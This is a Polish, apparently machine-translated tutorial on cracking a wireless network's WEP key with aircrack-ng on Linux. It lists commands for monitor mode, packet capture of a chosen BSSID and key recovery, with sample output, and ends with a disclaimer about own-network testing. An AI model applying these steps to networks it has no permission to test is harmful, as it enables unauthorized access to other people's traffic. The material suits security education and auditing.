jak złamać bezprzewodowy klucz WEP za pomocą Air Crack

w tym artykule opisano proste kroki dotyczące złamania bezprzewodowego klucza WEP za pomocą oprogramowania aircrack-ng. Można to zrobić, wąchając sieć bezprzewodową, przechwytując zaszyfrowane pakiety i uruchamiając odpowiedni program do szyfrowania, próbując odszyfrować przechwycone dane. WEP (Wired Equivalent Privacy ) jest dość łatwy do złamania, ponieważ używa tylko jednego klucza do szyfrowania całego ruchu.

podstawową zasadą jest to, że komunikacja między dwoma węzłami w sieci opiera się na adresie MAC. Każdy host otrzymuje pakiety przeznaczone tylko dla adresu MAC własnego interfejsu. Ta sama zasada dotyczy również sieci bezprzewodowych. Jednakże, jeśli jeden węzeł ustawi własną kartę sieciową w tryb promiscuous, otrzyma również pakiety, które nie są adresowane dla jego własnego adresu MAC.

aby złamać klucz WEP, haker musi przechwycić przykładowe pakiety nie przeznaczone dla jego własnego interfejsu sieciowego i uruchomić program crack, aby porównać klucze testowe z kluczem WEP dołączonym do przechwyconych pakietów w próbie odszyfrowania. Klucz, który pasuje do odszyfrowania przechwyconych pakietów, jest kluczem używanym przez sieć bezprzewodową do szyfrowania całej komunikacji bezprzewodowej z podłączonymi stacjami.

w poniższych sekcjach przeprowadzimy Cię przez instalację aircrack-ng w systemie Linux, a następnie pokażemy krok po kroku instrukcje dotyczące złamania bezprzewodowego klucza WEP. Przewodnik zakłada, że masz zainstalowaną kartę sieci bezprzewodowej i że obsługuje ona tryb monitora.

w tym tutorialu dowiesz się:

  • jak zainstalować aircrack-ng na głównych dystrybucjach Linuksa
  • jak złamać bezprzewodowy klucz WEP za pomocą aircrack-ng
jak złamać bezprzewodowy klucz WEP za pomocą aircrack-ng

jak złamać bezprzewodowy klucz WEP za pomocą aircrack-ng

wymagania programowe i konwencje wiersza poleceń Linuksa
Kategoria wymagania, konwencje lub używana wersja oprogramowania
System Dowolna dystrybucja Linuksa
oprogramowanie aircrack-ng
Inne uprzywilejowany dostęp do systemu Linux jako root lub za pomocą polecenia sudo.
konwencje # – wymaga wykonania podanych poleceń Linuksa z uprawnieniami roota albo bezpośrednio jako użytkownik root albo przy użyciu polecenia sudo
$ – wymaga wykonania podanych poleceń Linuksa jako zwykły użytkownik nieuprzywilejowany

zainstaluj aircrack-ng na głównych dystrybucjach Linuksa

aby rozpocząć, będziesz potrzebował oprogramowania aircrack-ng zainstalowanego w Twoim systemie. Możesz użyć odpowiedniego polecenia poniżej, aby zainstalować program za pomocą menedżera pakietów systemu.

aby zainstalować aircrack-ng na Ubuntu, Debianie i Linux Mint:

$ sudo apt install aircrack-ng

aby zainstalować aircrack-ng na CentOS, Fedora, AlmaLinux i Red Hat:

$ sudo dnf install aircrack-ng

aby zainstalować aircrack-ng na Arch Linux i Manjaro:

$ sudo pacman -S aircrack-ng

Crack bezprzewodowy klucz WEP

  1. najpierw musimy zidentyfikować nazwę naszego bezprzewodowego interfejsu sieciowego. Jeśli karta sieci bezprzewodowej jest prawidłowo zainstalowana, polecenie iwconfig wyświetli nazwę interfejsu sieci bezprzewodowej:
    $ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm

    wyjście pokazuje, że w naszym przypadku nazwa interfejsu to wlan0.

  2. następnie włącz tryb monitora dla interfejsu bezprzewodowego.
    # airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)

    wynik polecenia da Ci nazwę nowego interfejsu Wirtualnego. mon0

  3. zrzuć wyniki monitora do terminala, aby je zobaczyć.
    # airodump-ng mon0

    możesz zobaczyć tabelę danych dotyczących sieci bezprzewodowych w Twojej okolicy. Potrzebujesz tylko informacji o sieci, którą chcesz złamać. Poszukaj go i zwróć uwagę na BSSID i kanał, na którym jest.

  4. następnie rejestrujesz wyniki skanowania do pliku. Ten rejestr przechwytywania będzie potrzebny Aircrackowi do przeprowadzenia ataku brute force na sieć później. Aby uzyskać przechwycenie, wykonasz to samo polecenie, co wcześniej, ale określisz swój BSSID, kanał i lokalizację dziennika.
    # airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0

    wypełnij aktualne informacje przed uruchomieniem polecenia i pozostaw je uruchomione.

  5. ostatnim krokiem jest złamanie klucza WEP za pomocą przechwyconych pakietów i polecenia aircrack-ng. Wszystkie przechwycone pakiety są teraz przechowywane w pliku wep-crack-01.cap.
    # aircrack-ng -z wep-crack-01.cap

    twoje wyjście powinno wyglądać mniej więcej tak:

    Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
aircrack-ng próbuje złamać klucz WEP na Linuksie

aircrack-ng próbuje złamać klucz WEP na Linuksie

podsumowanie

w tym przewodniku zobaczyliśmy, jak zainstalować aircrack-ng na Linuksie i użyć tego oprogramowania do złamania bezprzewodowego klucza WEP. Pamiętaj, że ten proces powinien być używany tylko do testowania własnego bezpieczeństwa lub do celów edukacyjnych. Używanie go w cudzej sieci jest nielegalne.

Leave a Reply

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.